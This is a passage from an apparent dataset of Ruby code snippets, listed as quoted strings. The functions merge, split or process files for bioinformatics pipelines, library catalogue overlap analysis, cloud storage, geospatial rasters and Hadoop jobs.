mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.upstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start - upstream_alignmentlength + anchor_length\t\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start - downstream_alignmentlength + anchor_length\t\n\t\t\t\t\n\t\t\t\t\telse\n\t\t\t\t\t\tup = dna_a[upstream.start..upstream.start + read_length - 1].upcase\t\n\t\t\t\t\t\tupstream_alignmentlength = Alignment.downstream(upstream_read, up, mm)\n\t\t\t\t\t\tdownstream_alignmentlength = Alignment.downstream(downstream_read, down, mm)\n\t\t\t\t\t\tupstream_breakpoint = upstream.start + upstream_alignmentlength - 1\n\t\t\t\t\t\tdownstream_breakpoint = downstream.start + downstream_alignmentlength - 1\n\t\t\t\t\tend\n\n\t\t\t\t\ttotal_alignmentlength = upstream_alignmentlength + downstream_alignmentlength\n\n\t\t\t\t\tif total_alignmentlength >= read_length && total_alignmentlength <= max_overhang\n\t\t\t\t\t\toverhang = total_alignmentlength - read_length\n\t\n\t\t\t\t\t\tqname = qname.to_sym\n\t\t\t\t\t\tsummary = [chr_a, upstream_breakpoint, upstream.strand, chr_b, downstream_breakpoint, downstream.strand, total_alignmentlength, mate] \n\t\t\t\t\t\t# Candidates for which both, R1 and R2, are present are deleted\n\t\t\t\t\t\t# One read can neither fall on two different non-canonical nor the same junction\n\t\t\t\t\t\tif !output_hash.has_key?(qname)\n\t\t\t\t\t\t\toutput_hash[qname] = summary\n\t\t\t\t\t\telse\n\t\t\t\t\t\t\toutput_hash.delete(qname)\n\t\t\t\t\t\tend\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\n\t\tFile.open(output_file, 'w') do |output|\n\t\t\toutput_hash.each do |qname, v| \n\t\t\t\toutput.puts 
[\"#{qname.to_s}/#{v[-1]}\", v[0..-2]].join(\"\\t\") if (v[2] - v[1]).abs >= read_length\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Seed extension succeded.\"\n\tend",
"def run_blast_with_splitting evalue, threads, bin1, bin2\n # puts \"running blast by splitting input into #{threads} pieces\"\n if !File.exist?(@output1)\n blasts=[]\n files = split_input(@query, threads)\n threads = [threads, files.length].min\n files.threach(threads) do |thread|\n cmd1 = \"#{bin1} -query #{thread} -db #{@working_dir}/#{@target_name} \"\n cmd1 << \" -out #{thread}.blast -evalue #{evalue} \"\n cmd1 << \" -outfmt \\\"6 std qlen slen\\\" \"\n if bin1=~/blastn/\n cmd1 << \" -dust no \"\n elsif bin1=~/blastx/ or bin1=~/blastp/ or bin1=~/tblastn/\n cmd1 << \" -seg no \"\n end\n cmd1 << \" -soft_masking false \"\n cmd1 << \" -max_target_seqs 50 \"\n cmd1 << \" -num_threads 1\"\n if !File.exists?(\"#{thread}.blast\")\n blast1 = Cmd.new(cmd1)\n blast1.run\n if !blast1.status.success?\n raise RuntimeError.new(\"BLAST Error:\\n#{blast1.stderr}\")\n end\n end\n blasts << \"#{thread}.blast\"\n end\n cat_cmd = \"cat \"\n cat_cmd << blasts.join(\" \")\n cat_cmd << \" > #{@output1}\"\n catting = Cmd.new(cat_cmd)\n catting.run\n if !catting.status.success?\n raise RuntimeError.new(\"Problem catting files:\\n#{catting.stderr}\")\n end\n files.each do |file|\n File.delete(file) if File.exist?(file)\n end\n blasts.each do |b|\n File.delete(b) # delete intermediate blast output files\n end\n end\n\n if !File.exist?(@output2)\n blasts=[]\n files = split_input(@target, threads)\n threads = [threads, files.length].min\n files.threach(threads) do |thread|\n cmd2 = \"#{bin2} -query #{thread} -db #{@working_dir}/#{@query_name} \"\n cmd2 << \" -out #{thread}.blast -evalue #{evalue} \"\n cmd2 << \" -outfmt \\\"6 std qlen slen\\\" \"\n cmd2 << \" -max_target_seqs 50 \"\n cmd2 << \" -num_threads 1\"\n if !File.exists?(\"#{thread}.blast\")\n blast2 = Cmd.new(cmd2)\n blast2.run\n if !blast2.status.success?\n raise RuntimeError.new(\"BLAST Error:\\n#{blast2.stderr}\")\n end\n end\n blasts << \"#{thread}.blast\"\n end\n cat_cmd = \"cat \"\n cat_cmd << blasts.join(\" \")\n cat_cmd << \" > #{@output2}\"\n catting = Cmd.new(cat_cmd)\n catting.run\n if !catting.status.success?\n raise RuntimeError.new(\"Problem catting files:\\n#{catting.stderr}\")\n end\n files.each do |file|\n File.delete(file) if File.exist?(file)\n end\n blasts.each do |b|\n File.delete(b) # delete intermediate blast output files\n end\n end\n\n end",
"def overlap_analysis_for_bibs(bib_ids:, path:)\n # Get overlap info for source bib IDs and all others\n source_overlap_info = {}\n other_overlap_info = {}\n Dir.glob(\"#{path}/*.mrc\").each do |file|\n reader = MARC::Reader.new(file)\n reader.each do |record|\n id = record['001'].value.to_i\n overlap_info = get_overlap_info_from_record(record)\n overlap_info.delete(:id)\n oclc_910b = []\n record.fields('910').each do |field|\n vals = get_oclc_from_field(field, 'b')\n oclc_910b += vals\n end\n overlap_info[:std_nos][:oclc] += oclc_910b\n if bib_ids.include?(id)\n source_overlap_info[id] = overlap_info\n else\n other_overlap_info[id] = overlap_info\n end\n end\n end\n\n # Get overlap of identifiers\n source_lccn = source_overlap_info.values.map { |info| info[:std_nos][:lccn] }\n source_lccn.flatten!\n source_lccn.uniq!\n other_lccn = other_overlap_info.values.map { |info| info[:std_nos][:lccn] }\n other_lccn.flatten!\n other_lccn.uniq!\n overlap_lccn = source_lccn & other_lccn\n\n source_isbn = source_overlap_info.values.map { |info| info[:std_nos][:isbn] }\n source_isbn.flatten!\n source_isbn.uniq!\n other_isbn = other_overlap_info.values.map { |info| info[:std_nos][:isbn] }\n other_isbn.flatten!\n other_isbn.uniq!\n overlap_isbn = source_isbn & other_isbn\n\n source_issn = source_overlap_info.values.map { |info| info[:std_nos][:issn] }\n source_issn.flatten!\n source_issn.uniq!\n other_issn = other_overlap_info.values.map { |info| info[:std_nos][:issn] }\n other_issn.flatten!\n other_issn.uniq!\n overlap_issn = source_issn & other_issn\n\n source_oclc = source_overlap_info.values.map { |info| info[:std_nos][:oclc] }\n source_oclc.flatten!\n source_oclc.uniq!\n other_oclc = other_overlap_info.values.map { |info| info[:std_nos][:oclc] }\n other_oclc.flatten!\n other_oclc.uniq!\n overlap_oclc = source_oclc & other_oclc\n\n source_title = source_overlap_info.values.map { |info| info[:title_brief] }\n source_title.uniq!\n other_title = other_overlap_info.values.map { |info| info[:title_brief] }\n other_title.uniq!\n overlap_title = source_title & other_title\n\n # Get source records where two identifiers match\n # the overlapping standard numbers\n source_lccn_isbn_overlap = source_overlap_info.select do |_id, info|\n info[:std_nos][:lccn] &&\n !(info[:std_nos][:lccn] & overlap_lccn).empty? &&\n info[:std_nos][:isbn] &&\n !(info[:std_nos][:isbn] & overlap_isbn).empty?\n end\n\n source_lccn_issn_overlap = source_overlap_info.select do |_id, info|\n info[:std_nos][:lccn] &&\n !(info[:std_nos][:lccn] & overlap_lccn).empty? &&\n info[:std_nos][:issn] &&\n !(info[:std_nos][:issn] & overlap_issn).empty?\n end\n\n source_lccn_oclc_overlap = source_overlap_info.select do |_id, info|\n info[:std_nos][:lccn] &&\n !(info[:std_nos][:lccn] & overlap_lccn).empty? &&\n info[:std_nos][:oclc] &&\n !(info[:std_nos][:oclc] & overlap_oclc).empty?\n end\n\n source_lccn_title_overlap = source_overlap_info.select do |_id, info|\n info[:std_nos][:lccn] &&\n !(info[:std_nos][:lccn] & overlap_lccn).empty? &&\n overlap_title.include?(info[:title_brief])\n end\n\n source_isbn_issn_overlap = source_overlap_info.select do |_id, info|\n info[:std_nos][:isbn] &&\n !(info[:std_nos][:isbn] & overlap_isbn).empty? &&\n info[:std_nos][:issn] &&\n !(info[:std_nos][:issn] & overlap_issn).empty?\n end\n\n source_isbn_oclc_overlap = source_overlap_info.select do |_id, info|\n info[:std_nos][:isbn] &&\n !(info[:std_nos][:isbn] & overlap_isbn).empty? 
&&\n info[:std_nos][:oclc] &&\n !(info[:std_nos][:oclc] & overlap_oclc).empty?\n end\n\n source_isbn_title_overlap = source_overlap_info.select do |_id, info|\n info[:std_nos][:isbn] &&\n !(info[:std_nos][:isbn] & overlap_isbn).empty? &&\n overlap_title.include?(info[:title_brief])\n end\n\n source_issn_oclc_overlap = source_overlap_info.select do |_id, info|\n info[:std_nos][:issn] &&\n !(info[:std_nos][:issn] & overlap_issn).empty? &&\n info[:std_nos][:oclc] &&\n !(info[:std_nos][:oclc] & overlap_oclc).empty?\n end\n\n source_issn_title_overlap = source_overlap_info.select do |_id, info|\n info[:std_nos][:issn] &&\n !(info[:std_nos][:issn] & overlap_issn).empty? &&\n overlap_title.include?(info[:title_brief])\n end\n\n source_oclc_title_overlap = source_overlap_info.select do |_id, info|\n info[:std_nos][:oclc] &&\n !(info[:std_nos][:oclc] & overlap_oclc).empty? &&\n overlap_title.include?(info[:norm_title])\n end\n\n # Create a hash with source bib IDs as the keys and\n # matching other bibs as the values\n source_to_other = {}\n source_lccn_isbn_overlap.each do |id, info|\n matches = other_overlap_info.select do |_match_id, match_info|\n !(match_info[:std_nos][:lccn] & info[:std_nos][:lccn]).empty? &&\n !(match_info[:std_nos][:isbn] & info[:std_nos][:isbn]).empty?\n end\n unless matches.empty?\n source_to_other[id] ||= []\n matches.each_key { |match_id| source_to_other[id] << match_id }\n end\n end\n\n source_lccn_issn_overlap.each do |id, info|\n matches = other_overlap_info.select do |_match_id, match_info|\n !(match_info[:std_nos][:lccn] & info[:std_nos][:lccn]).empty? &&\n !(match_info[:std_nos][:issn] & info[:std_nos][:issn]).empty?\n end\n unless matches.empty?\n source_to_other[id] ||= []\n matches.each_key { |match_id| source_to_other[id] << match_id }\n end\n end\n\n source_lccn_oclc_overlap.each do |id, info|\n matches = other_overlap_info.select do |_match_id, match_info|\n !(match_info[:std_nos][:lccn] & info[:std_nos][:lccn]).empty? &&\n !(match_info[:std_nos][:oclc] & info[:std_nos][:oclc]).empty?\n end\n unless matches.empty?\n source_to_other[id] ||= []\n matches.each_key { |match_id| source_to_other[id] << match_id }\n end\n end\n\n source_lccn_title_overlap.each do |id, info|\n matches = other_overlap_info.select do |_match_id, match_info|\n !(match_info[:std_nos][:lccn] & info[:std_nos][:lccn]).empty? &&\n match_info[:title_brief] == info[:title_brief]\n end\n unless matches.empty?\n source_to_other[id] ||= []\n matches.each_key { |match_id| source_to_other[id] << match_id }\n end\n end\n\n source_isbn_issn_overlap.each do |id, info|\n matches = other_overlap_info.select do |_match_id, match_info|\n !(match_info[:std_nos][:isbn] & info[:std_nos][:isbn]).empty? &&\n !(match_info[:std_nos][:issn] & info[:std_nos][:issn]).empty?\n end\n unless matches.empty?\n source_to_other[id] ||= []\n matches.each_key { |match_id| source_to_other[id] << match_id }\n end\n end\n\n source_isbn_oclc_overlap.each do |id, info|\n matches = other_overlap_info.select do |_match_id, match_info|\n !(match_info[:std_nos][:isbn] & info[:std_nos][:isbn]).empty? &&\n !(match_info[:std_nos][:oclc] & info[:std_nos][:oclc]).empty?\n end\n unless matches.empty?\n source_to_other[id] ||= []\n matches.each_key { |match_id| source_to_other[id] << match_id }\n end\n end\n\n source_isbn_title_overlap.each do |id, info|\n matches = other_overlap_info.select do |_match_id, match_info|\n !(match_info[:std_nos][:isbn] & info[:std_nos][:isbn]).empty? 
&&\n match_info[:title_brief] == info[:title_brief]\n end\n unless matches.empty?\n source_to_other[id] ||= []\n matches.each_key { |match_id| source_to_other[id] << match_id }\n end\n end\n\n source_issn_oclc_overlap.each do |id, info|\n matches = other_overlap_info.select do |_match_id, match_info|\n !(match_info[:std_nos][:issn] & info[:std_nos][:issn]).empty? &&\n !(match_info[:std_nos][:oclc] & info[:std_nos][:oclc]).empty?\n end\n unless matches.empty?\n source_to_other[id] ||= []\n matches.each_key { |match_id| source_to_other[id] << match_id }\n end\n end\n\n source_issn_title_overlap.each do |id, info|\n matches = other_overlap_info.select do |_match_id, match_info|\n !(match_info[:std_nos][:issn] & info[:std_nos][:issn]).empty? &&\n match_info[:title_brief] == info[:title_brief]\n end\n unless matches.empty?\n source_to_other[id] ||= []\n matches.each_key { |match_id| source_to_other[id] << match_id }\n end\n end\n\n source_oclc_title_overlap.each do |id, info|\n matches = other_overlap_info.select do |_match_id, match_info|\n !(match_info[:std_nos][:oclc] & info[:std_nos][:oclc]).empty? &&\n match_info[:title_brief] == info[:title_brief]\n end\n unless matches.empty?\n source_to_other[id] ||= []\n matches.each_key { |match_id| source_to_other[id] << match_id }\n end\n end\n\n ### Clean up the matches\n source_to_other.each_value(&:uniq!)\n source_to_other\nend",
"def perform\n result_file = nil\n \n # Create the alignment files\n result_file = generate_alignment if @task == :all || @task == :align\n \n # Identify the clusters\n result_file = identify_clusters if @task == :all || @task == :cluster\n \n result_file\n end",
"def compose_file bucket_name:, first_file_name:, second_file_name:, destination_file_name:\n # The ID of your GCS bucket\n # bucket_name = \"your-unique-bucket-name\"\n\n # The ID of the first GCS object to compose\n # first_file_name = \"your-first-file-name\"\n\n # The ID of the second GCS object to compose\n # second_file_name = \"your-second-file-name\"\n\n # The ID to give the new composite object\n # destination_file_name = \"new-composite-file-name\"\n\n require \"google/cloud/storage\"\n\n storage = Google::Cloud::Storage.new\n bucket = storage.bucket bucket_name, skip_lookup: true\n\n destination = bucket.compose [first_file_name, second_file_name], destination_file_name do |f|\n f.content_type = \"text/plain\"\n end\n\n puts \"Composed new file #{destination.name} in the bucket #{bucket_name} \" \\\n \"by combining #{first_file_name} and #{second_file_name}\"\nend",
"def merge(*sources); end",
"def merge_all\n merge_concurrent(0)\n end",
"def merge(prt_pdb, lig_pdb, complex_pdb)\n prt_lines = File.readlines(prt_pdb)\n lig_lines = File.readlines(lig_pdb)\n\n prt_atm_lines = prt_lines.select { |line| /ATOM/ =~ line }\n lig_atm_lines = lig_lines.select { |line| /HETATM/ =~ line}\n\n f = File.open(complex_pdb, 'w')\n\n f.write(\"MODEL 1\\n\")\n prt_atm_lines.each do |line| f.write(line) end\n f.write(\"TER\\n\")\n lig_atm_lines.each do |line| f.write(line) end\n f.write(\"END\\n\")\n\n f.close()\n\nend",
"def candidates2fa(input_file, fasta, read_length, output_file, exoncov=8)\n\t\tchromosomes = {}\n\t\tpositions = []\n\t\t\n\t\t# Input into hash sorted by chromosomes\n\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\tline = line.strip.split(\"\\t\")[0..-2]\n\t\t\tchr_a, pos_a, strand_a, chr_b, pos_b, strand_b = line[0..5]\n\t\t\tpos = [chr_a, pos_a, chr_b, pos_b].join(':')\n\t\n\t\t\tchromosomes[chr_a] = {} if !chromosomes.has_key?(chr_a)\n\t\t\t\n\t\t\tif !chromosomes.has_key?(chr_b)\n\t\t\t\tchromosomes[chr_a][chr_b] = [line]\n\t\t\n\t\t\t# 2nd elsif to exclude reads that map on same junction but opposite ends\t\t\n\t\t\telsif chromosomes[chr_a].has_key?(chr_b) && !positions.include?(pos)\n\t\t\t\tchromosomes[chr_a][chr_b].push(line)\n\t\t\t\tpositions << pos\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\toutput = File.open(output_file, 'w') do |output|\n\t\t\tchromosomes.each do |chr_a, values|\n\t\t\t\tfasta_file = File.open(\"#{fasta}#{chr_a}.fa\", 'r')\n\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\tdna_a = fasta_file.read.gsub(/\\n/, '')\n\t\t\t\t\n\t\t\t\tvalues.each do |chr_b, values|\n\t\t\t\t fasta_file = File.open(\"#{fasta}#{chr_b}.fa\", 'r')\n\t\t\t\t\theader = fasta_file.gets.strip\n\t\t\t\t\tdna_b = fasta_file.read.gsub(/\\n/, '')\n\n\t\t\t\t\tvalues.each do |v|\n\t\t\t\t\t\tbp_a, bp_b = v[1].to_i, v[4].to_i\n\t\t\t\t\t\tstrand_a, strand_b = v[2], v[5]\n\t\t\t\t\t\toverlap = v[-1].to_i - read_length\n\t\t\t\t\t\tl = read_length - exoncov \n\t\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\tupstream = dna_a[bp_a..bp_a + overlap + l].upcase\t\n\t\t\t\t\t\tdownstream = dna_b[bp_b - l - overlap + 1..bp_b - overlap].upcase\n\t\t\t\t\t\n\t\t\t\t\t\tif strand_a == '1' && strand_b == '-1'\n\t\t\t\t\t\t\tdownstream = Alignment.reverse_complement(dna_b[bp_b..bp_b + l].upcase)\n\t\t\t\t\t\telsif strand_a == '-1' && strand_b == '1'\n\t\t\t\t\t\t\tupstream = Alignment.reverse_complement(dna_a[bp_a - l + 1..bp_a].upcase)\n\t\t\t\t\t\tend\n\t\t\n\t\t\t\t\t\tid = [v[0..1], v[3..4]].join(':')\n\t\t\t\t\t\toutput.puts [\">#{id}\", downstream + upstream].join(\"\\n\")\n\t\t\t\t\tend\n\t\t\t\tend\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Wrote loci to fasta-file.\"\n\tend",
"def process_files files=[]\n files.each do |file|\n process_file file\n end\n end",
"def combine_files(file1, file2)\n new_coverage = combine_coverages(file1.coverage, file2.coverage)\n # NOTE: It is possible that both don't exist but eventually either one does or it's just one of the names that was\n # used in the code\n new_filename = strict_file_exists?(file1.filename) ? file1.filename : file2.filename\n SimpleCov::SourceFile.new(new_filename, new_coverage)\n end",
"def gdal_merge(input_files, output_file, merge_strategy = :lossless)\n return nil if input_files.length == 0\n return CDBTool.link_output(input_files[0], output_file) if input_files.length == 1\n\n command = case merge_strategy\n when :lossless\n \"gdal_merge.py -o #{output_file} -co BIGTIFF=YES -co COMPRESS=LZW -co NUM_THREADS=ALL_CPUS -co TILED=YES -n 0 -a_nodata 0 #{input_files.join(\" \")}\"\n when :lossy\n \"gdal_merge.py -o #{output_file} -co BIGTIFF=YES -co COMPRESS=JPEG -co TILED=YES #{input_files.join(\" \")}\"\n end\n\n merge = Mixlib::ShellOut.new(command, live_stdout: $stdout, live_stderr: $stderr)\n\n if File.exists?(output_file)\n puts \"Output exists, skipping merge command.\"\n else\n puts command\n merge.run_command\n $mosaic.log(\"#{output_file},#{File.size(output_file)},#{merge.execution_time}s\")\n end\nend",
"def writeFinalSequenceFrag()\n outFile = File.new(@seqNameRead1, \"w\")\n\n @read1FileList.each do |file|\n reader = Zlib::GzipReader.open(file)\n while(line = reader.gets)\n line.strip!\n\n if line.match(/^@/)\n @numReadsRead1 = @numReadsRead1 + 1\n\n # Read next 3 lines to complete reading 1 Fastq record\n readString = reader.gets.strip\n qualHeader = reader.gets.strip\n qualString = reader.gets.strip\n\n if line.match(/\\s\\d:N:/)\n @numFilteredRead1 = @numFilteredRead1 + 1\n writeFastqRecordToFile(outFile, line, readString, qualHeader,\n qualString)\n end\n end\n end\n reader.close\n end\n outFile.close\n end",
"def _combine\n @@round = @@round + 1\n files = @files.values\n @file_list = []\n\n files.each {|f| _include_file(f) }\n \n content = \"$theme: '\" + @options[:theme] + \"';\"\n\n content += @file_list.map {|file|\n \"@_chance_file \" + @files.key(file[:path]) + \";\\n\" + file[:content]\n }.join(\"\\n\")\n\n content\n end",
"def parse_in_order(*files); end",
"def combine_mp3s_transfer(staging_folder, dump_folder, bucket, episode)\n \n if $count > 0\n temp_file = \"temp.mp3\"\n Dir.chdir(dump_folder) do\n Dir['*.mp3'].sort.each do |fn|\n `cat \"#{fn}\" >> #{temp_file}`\n puts \"#{fn} >> #{temp_file}\"\n end\n\n file_mtime = File.mtime(temp_file).to_s.gsub(' ','%')\n file_size = File.size(temp_file)\n episode_name = get_file_as_string('episode_name.txt').gsub(\" \",\"-\")\n file_name = \"#{episode_name}_#{file_mtime}_#{file_size}\"\n final_mp3 = \"../#{staging_folder}/#{file_name}.mp3\"\n File.rename(temp_file, final_mp3)\n\n if $publish==true\n # Deploy to S3\n puts \"Finished deploying mp3 to AWS\" \n bucket.object(\"episodes/#{file_name.encrypt(ENV['ENCRYPT_SECRET'])}.mp3\").upload_file(final_mp3, acl:'public-read')\n end\n end\n end\n # Clean up dump folder\n FileUtils.rm_rf(dump_folder)\nend",
"def merge_collections mine, other, other_files, &block # :nodoc:\n my_things = mine. group_by { |thing| thing.file }\n other_things = other.group_by { |thing| thing.file }\n\n remove_things my_things, other_files, &block\n add_things my_things, other_things, &block\n end",
"def collaps_qnames(input_file, output_file)\n\t\n\t\tloci = {}\n\t\n\t\t# Read candidate loci and count reads/locus\n\t\tFile.open(input_file, 'r').readlines.each do |line|\n\t\t\tline = line.strip.split(\"\\t\")\n\t\t\tqname = line[0]\n\t\t\tbase = qname.gsub(/\\/[1,2]/, '')\n\t\t\tpos_a = line[1..3].join(':')\n\t\t\tpos_b = line[4..6].join(':')\n\t\t\tpos = [pos_a, pos_b].join(':')\n\n\t\t\talignment_length = line[-1]\n\t\n\t\t\tif !loci.has_key?(pos)\n\t\t\t\tloci[pos] = {:count => 1, :qnames => [qname], :l => alignment_length}\n\t\t\telse \n\t\t\t\tloci[pos][:qnames] << qname\n\t\t\t\tloci[pos][:count] += 1\n\t\t\tend\n\t\tend\n\n\t\t# Output\n\t\tFile.open(output_file, 'w') do |output|\n\t\t\tloci.each do |pos, v| \n\t\t\t\toutput.puts [pos.split(':'), v[:count], v[:l], v[:qnames].join(';')].join(\"\\t\") if v[:count] > 0\n\t\t\tend\n\t\tend\n\t\t$logfile.puts \"#{Time.new.strftime(\"%c\")}: Collapsed anchor pairs to single loci.\"\n\tend",
"def 500_files(input)\n # naive solution is to flatten and sort\n\n \nend",
"def parse_to_file(outdir)\n z_unique = File.new(outdir+\"_unique\", 'w')\n z_non_unique = File.new(outdir+\"_non_unique\", 'w')\n entries = []\n while !@filehandler.eof?\n entry1 = make_entry()\n line = @filehandler.readline()\n entry2 = make_entry()\n if entry1.q_name == entry2.q_name\n # What if on same chromosome?\n # calling helper procedure\n entries << entry1\n marker2 = true\n while entry1.q_name == entry2.q_name\n # same chrosome?\n if entry1.t_name == entry2.t_name\n entries << entry2\n if @filehandler.eof?\n marker = false\n break\n else\n line = @filehandler.readline()\n entry2 = make_entry()\n marker = true\n end\n else\n marker2 = false\n @counter_non_unique += 1\n out = \"#{entry1.to_s()}\"\n z_non_unique.write(out+\"\\n\")\n while entry1.q_name == entry2.q_name\n out = \"#{entry2.to_s()}\"\n z_non_unique.write(out+\"\\n\")\n if @filehandler.eof?\n marker = false\n break\n else\n line = @filehandler.readline()\n entry2 = make_entry()\n marker = 1\n end\n end\n end\n if marker2\n is_in_range?(entries, z_unique, z_non_unique)\n end\n end\n else\n @counter_unique += 1\n out = \"#{entry1.to_s()}\"\n z_unique.write(out+\"\\n\")\n marker = false\n end\n end\n if marker\n @counter_unique += 1\n out = \"#{entry2.to_s()}\"\n z_unique.write(out+\"\\n\")\n end\n\n z_non_unique.close\n z_unique.close\n end",
"def merge_join(key_index, file1, file2)\n # Sorting part.\n merge_sorter!(key_index, file1, file2)\n # Merging part.\n r = file1[i = 0]\n q = file2[j = 0]\n while i != file1.length && j != file2.length\n if greater_than?(r[key_index], q[key_index])\n q = file2[j += 1]\n elsif less_than?(r[key_index], q[key_index])\n r = file1[i += 1]\n else\n # The records match on the join key.\n puts \"#{r[key_index]} #{r.reject { |e| e == r[key_index] }.to_csv.chomp} #{q.reject \\\n { |e| e == r[key_index] }.to_csv.chomp}\" unless r[key_index].nil? || q[key_index].nil?\n t = file2[k = j + 1]\n # Check for further records that match with r on the join key.\n while k != file2.length && r[key_index] == t[key_index]\n puts \"#{r[key_index]} #{r.reject { |e| e == r[key_index] }.to_csv.chomp} #{t.reject \\\n { |e| e == r[key_index] }.to_csv.chomp}\" unless r[key_index].nil? || t[key_index].nil?\n t = file2[k += 1]\n end\n s = file1[l = i + 1]\n # Check for further records that match with q on the join key.\n while l != file1.length && q[key_index] == s[key_index]\n puts \"#{q[key_index]} #{q.reject { |e| e == q[key_index] }.to_csv.chomp} #{s.reject \\\n { |e| e == q[key_index] }.to_csv.chomp}\" unless q[key_index].nil? || s[key_index].nil?\n s = file1[l += 1]\n end\n r = file1[i += 1]\n q = file2[j += 1]\n end\n end\nend",
"def split_upids(idmap_file)\n puts \"split idmapping.dat to each prefix files\"\n up_refp_output = prepare_prefix_files(idmap_file, \"protein_id\")\n up_refg_output = prepare_prefix_files(idmap_file, \"gene_id\")\n\n cnt = 0\n # it is assumed that the tax_id is followed by a protein_id or gene_id\n current_tax = {upid: nil, tax_id: nil}\n taxid_missing_list = [] \n File.open(idmap_file, \"r\") do |f|\n f.each_line do |line|\n up, xref, id = line.strip.split(\"\\t\")\n case xref\n when \"NCBI_TaxID\"\n current_tax = {upid: up.split(\"-\").first, tax_id: id}\n when \"RefSeq\", \"GeneID\"\n # Push only the tax_id with refseq protein_id or gene_id\n if current_tax[:upid] == up.split(\"-\").first\n if xref == \"RefSeq\"\n prefix = id.chomp.strip[0..4]\n up_refp_output[prefix].puts line.chomp.strip + \"\\t\" + current_tax[:tax_id]\n elsif xref == \"GeneID\"\n prefix = id.chomp.strip[0]\n up_refg_output[prefix].puts line.chomp.strip + \"\\t\" + current_tax[:tax_id]\n end\n else\n taxid_missing_list.push(up)\n end\n end\n cnt += 1\n if (cnt % 100000 == 0)\n puts cnt\n end\n end\n # list of upid that can't get taxid. Depends on the order of idmapping.dat\n out = File.open(\"taxid_missing_list.json\", \"w\") unless taxid_missing_list.size == 0\n taxid_missing_list.each do |upid|\n out.puts JSON.pretty_generate(taxid_missing_list)\n end\n end\n\n # close files\n up_refp_output.each do |k, v|\n v.flush\n v.close\n end\n up_refg_output.each do |k, v|\n v.flush\n v.close\n end\nend",
"def export_gap_mark_tagging(options)\n input_file_spec = options['input'] || 'content_dir/at_files'\n input_base_dir_name, input_file_pattern_name = input_file_spec.split(\n Repositext::Cli::FILE_SPEC_DELIMITER\n )\n output_base_dir = options['output'] || config.base_dir('gap_mark_tagging_export_dir')\n Repositext::Cli::Utils.export_files(\n config.base_dir(input_base_dir_name),\n config.file_pattern(input_file_pattern_name),\n output_base_dir,\n /\\.at\\Z/i,\n \"Exporting AT files to gap_mark tagging\",\n options.merge(\n :output_path_lambda => lambda { |input_filename, output_file_attrs|\n input_filename.gsub(config.base_dir(input_base_dir_name), output_base_dir)\n .gsub(/\\.at\\z/, '.gap_mark_tagging.txt')\n }\n )\n ) do |contents, filename|\n outcome = Repositext::Export::GapMarkTagging.export(contents)\n if outcome.success?\n [Outcome.new(true, { contents: outcome.result, extension: 'gap_mark_tagging.txt' })]\n else\n outcome\n end\n end\n end",
"def dist_merge inputs, output, options = {}\n options[:reduce_tasks] ||= 25\n options[:partition_fields] ||= 2\n options[:sort_fields] ||= 2\n options[:field_separator] ||= '/t'\n names = inputs.map{|inp| File.basename(inp)}.join(',')\n cmd = \"#{@hadoop_home}/bin/hadoop \\\\\n jar #{@hadoop_home}/contrib/streaming/hadoop-*streaming*.jar \\\\\n -D mapred.job.name=\\\"Swineherd Merge (#{names} -> #{output})\\\" \\\\\n -D num.key.fields.for.partition=\\\"#{options[:partition_fields]}\\\" \\\\\n -D stream.num.map.output.key.fields=\\\"#{options[:sort_fields]}\\\" \\\\\n -D mapred.text.key.partitioner.options=\\\"-k1,#{options[:partition_fields]}\\\" \\\\\n -D stream.map.output.field.separator=\\\"'#{options[:field_separator]}'\\\" \\\\\n -D mapred.min.split.size=1000000000 \\\\\n -D mapred.reduce.tasks=#{options[:reduce_tasks]} \\\\\n -partitioner org.apache.hadoop.mapred.lib.KeyFieldBasedPartitioner \\\\\n -mapper \\\"/bin/cat\\\" \\\\\n -reducer \\\"/usr/bin/uniq\\\" \\\\\n -input \\\"#{inputs.join(',')}\\\" \\\\\n -output \\\"#{output}\\\"\"\n puts cmd\n system cmd\n end",
"def dist_merge inputs, output, options = {}\n options[:reduce_tasks] ||= 25\n options[:partition_fields] ||= 2\n options[:sort_fields] ||= 2\n options[:field_separator] ||= '/t'\n names = inputs.map{|inp| File.basename(inp)}.join(',')\n cmd = \"#{@hadoop_home}/bin/hadoop \\\\\n jar #{@hadoop_home}/contrib/streaming/hadoop-*streaming*.jar \\\\\n -D mapred.job.name=\\\"Swineherd Merge (#{names} -> #{output})\\\" \\\\\n -D num.key.fields.for.partition=\\\"#{options[:partition_fields]}\\\" \\\\\n -D stream.num.map.output.key.fields=\\\"#{options[:sort_fields]}\\\" \\\\\n -D mapred.text.key.partitioner.options=\\\"-k1,#{options[:partition_fields]}\\\" \\\\\n -D stream.map.output.field.separator=\\\"'#{options[:field_separator]}'\\\" \\\\\n -D mapred.min.split.size=1000000000 \\\\\n -D mapred.reduce.tasks=#{options[:reduce_tasks]} \\\\\n -partitioner org.apache.hadoop.mapred.lib.KeyFieldBasedPartitioner \\\\\n -mapper \\\"/bin/cat\\\" \\\\\n -reducer \\\"/usr/bin/uniq\\\" \\\\\n -input \\\"#{inputs.join(',')}\\\" \\\\\n -output \\\"#{output}\\\"\"\n puts cmd\n system cmd\n end",
